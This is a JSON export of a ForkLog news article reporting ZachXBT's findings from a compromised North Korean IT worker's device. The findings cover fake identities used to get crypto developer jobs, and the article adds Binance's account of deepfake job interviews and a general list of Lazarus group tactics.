{"id":26082,"date":"2025-08-14T13:06:22","date_gmt":"2025-08-14T10:06:22","guid":{"rendered":"https:\/\/forklog.com\/en\/user-hacks-north-korean-hacker\/"},"modified":"2025-08-14T13:06:22","modified_gmt":"2025-08-14T10:06:22","slug":"user-hacks-north-korean-hacker","status":"publish","type":"post","link":"https:\/\/forklog.com\/en\/user-hacks-north-korean-hacker\/","title":{"rendered":"User Hacks North Korean Hacker"},"content":{"rendered":"<p>An unidentified user has hacked the account of an IT specialist from North Korea, who was part of a small hacker group linked to the theft of $680,000. This was revealed by blockchain detective ZachXBT.<\/p>\n<blockquote class=\"twitter-tweet\">\n<p lang=\"en\" dir=\"ltr\">1\/ An unnamed source recently compromised a DPRK IT worker device which provided insights into how a small team of five ITWs operated 30+ fake identities with government IDs and purchased Upwork\/LinkedIn accounts to obtain developer jobs at projects. <a href=\"https:\/\/t.co\/DEMv0GNM79\">pic.twitter.com\/DEMv0GNM79<\/a><\/p>\n<p>\u2014 ZachXBT (@zachxbt) <a href=\"https:\/\/twitter.com\/zachxbt\/status\/1955613912201896113?ref_src=twsrc%5Etfw\">August 13, 2025<\/a><\/p><\/blockquote>\n<p> <script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>Six North Korean citizens created over 30 fictitious identities to secure positions in crypto projects. They purchased fake documents and accounts on LinkedIn and Upwork, posing as experienced blockchain developers. One even passed an interview at Polygon Labs for a full-stack engineer position, claiming experience with OpenSea and Chainlink in their resume.<\/p>\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/forklog.com\/wp-content\/uploads\/AD_4nXe-xjP9WyOh5Mza84IQanZG2oVOtms2WEvNLETN3CKo4OzBzajKmYLgqfmMifxGpqTTN-rRHQilBbc1uBUl0LUJRXyok35Fud7UXQvzbROwHxwfQaiZxoGeU_hpN9dY34j8Zm0Nw.webp\" alt=\"User Hacks North Korean Hacker\" class=\"wp-image-263903\"\/><figcaption class=\"wp-element-caption\">Source: X.<\/figcaption><\/figure>\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u201cMy professional experience in blockchain development spans over seven years (including university), although I have officially worked full-time for about five years. During this period, I developed smart contract systems, decentralized applications, and Web3 platforms, including at OpenSea, Chainlink Labs, and GreenBay,\u201d reads the script used for the fake identity named Henry Chan.<\/p>\n<\/blockquote>\n<p>The hackers conducted their work using <span data-descr=\"software\" class=\"old_tooltip\">software<\/span> for remote access, AnyDesk, and concealed their location via VPN. They used Google services for task planning and communication. In May, the operational expenses of the perpetrators amounted to $1489, covering computer rentals and software subscriptions.<\/p>\n<p>The cybercriminals executed transactions through the Payoneer service. One of the wallets is linked to a group involved in the June <a href=\"https:\/\/x.com\/zachxbt\/status\/1938599027748319442\">attack on the Favrr marketplace<\/a>. During this breach, the perpetrators stole $680,000.<\/p>\n<p>Search queries accessed included questions about deploying ERC-20 on Solana and leading AI companies in Europe. However, the most frequent was: \u201chow to tell if they are North Koreans?\u201d<\/p>\n<p>ZachXBT also highlighted that the search history showed active use of Google Translate with translations from Korean to English via a Russian IP.<\/p>\n<p>The blockchain detective urged crypto companies to better vet candidates, emphasizing that such operations are not complex. He noted that vulnerabilities are exacerbated by overwhelmed HR departments.<\/p>\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u201cThe main issue in combating DPRK IT workers (DPRK ITWs) is the lack of cooperation between government agencies and the private sector. Another challenge is the negligence of recruiting teams, who start arguing upon receiving warnings. The methods of DPRK ITWs are not sophisticated, but they are persistent due to their massive presence in the global job market,\u201d he noted.<\/p>\n<\/blockquote>\n<h2 class=\"wp-block-heading\">North Korean Hackers at Binance<\/h2>\n<p>Binance&#8217;s Chief Security Officer Jimmy Su told <a href=\"https:\/\/decrypt.co\/334943\/north-korean-hackers-binance\">Decrypt<\/a> that the exchange receives fake resumes from North Korean hackers daily. According to him, this has been ongoing for years, but recently the perpetrators&#8217; tactics have become more sophisticated.<\/p>\n<p>Previously, they sent template applications with Japanese and Chinese surnames. However, now the cybercriminals use deepfakes and voice modulators in interviews, posing as developers from Europe or the Middle East.<\/p>\n<p>Suspicion arises from slow internet connections. According to Su, due to the use of translators and other simulators, the perpetrators&#8217; responses are delayed by several seconds.<\/p>\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u201cThe only reliable way to verify a candidate is to ask them to cover their face with their hand. The deepfake usually &#8216;breaks,&#8217; but we do not disclose all methods to avoid aiding the hackers,\u201d he added.<\/p>\n<\/blockquote>\n<p>A Binance representative stated that the exchange has never hired North Korean state agents but continues to monitor employees for suspicious behavior. Specialists from North Korea often rank among the top performers\u2014likely due to working multiple shifts. If someone does not take breaks even for sleep, it is a typical sign of a connection to Lazarus, Su noted.<\/p>\n<p>He added that some companies ask candidates to speak negatively about North Korean leader Kim Jong Un during interviews, which is prohibited in the country. Other details were not disclosed by the Binance representative for security reasons.<\/p>\n<p>In addition to employment attempts, Lazarus also:<\/p>\n<ul class=\"wp-block-list\">\n<li>infect <span data-descr=\"package manager included with Node.js\" class=\"old_tooltip\">NPM<\/span> libraries\u2014adding malicious code to open repositories, which is embedded in projects;<\/li>\n<li>conduct phishing \u201cinterviews\u201d\u2014posing as recruiters, offering to update Zoom via a fake link, and infecting victims&#8217; devices with malware.<\/li>\n<\/ul>\n<p>In February, the Bybit exchange <a href=\"https:\/\/forklog.com\/en\/news\/bybit-exchange-suffers-1-46-billion-loss-in-hack\">lost<\/a> $1.46 billion in a hack. Cybersecurity experts <a href=\"https:\/\/forklog.com\/en\/news\/ben-zhou-majority-of-stolen-bybit-funds-remain-traceable\">blamed<\/a> the Lazarus group for this. <\/p>\n<p>In July, the Indian trading platform CoinDCX suffered a loss of $44.2 million. The cyberattack was also <a href=\"https:\/\/forklog.com\/en\/news\/lazarus-group-implicated-in-44-million-coindcx-hack\">attributed<\/a> to North Korean hackers.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>An unidentified user has hacked the account of an IT specialist from North Korea, who was part of a small hacker group linked to the theft of $680,000. This was revealed by blockchain detective ZachXBT. 1\/ An unnamed source recently compromised a DPRK IT worker device which provided insights into how a small team of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":26081,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"select":"","news_style_id":"","cryptorium_level":"","_short_excerpt_text":"","creation_source":"","_metatest_mainpost_news_update":false,"footnotes":""},"categories":[3],"tags":[44,1125,1202],"class_list":["post-26082","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-and-analysis","tag-cybercrime","tag-lazarus","tag-north-korea-dprk"],"aioseo_notices":[],"amp_enabled":true,"views":"130","promo_type":"","layout_type":"","short_excerpt":"","is_update":"","_links":{"self":[{"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/posts\/26082","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/comments?post=26082"}],"version-history":[{"count":0,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/posts\/26082\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/media\/26081"}],"wp:attachment":[{"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/media?parent=26082"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/categories?post=26082"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/forklog.com\/en\/wp-json\/wp\/v2\/tags?post=26082"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}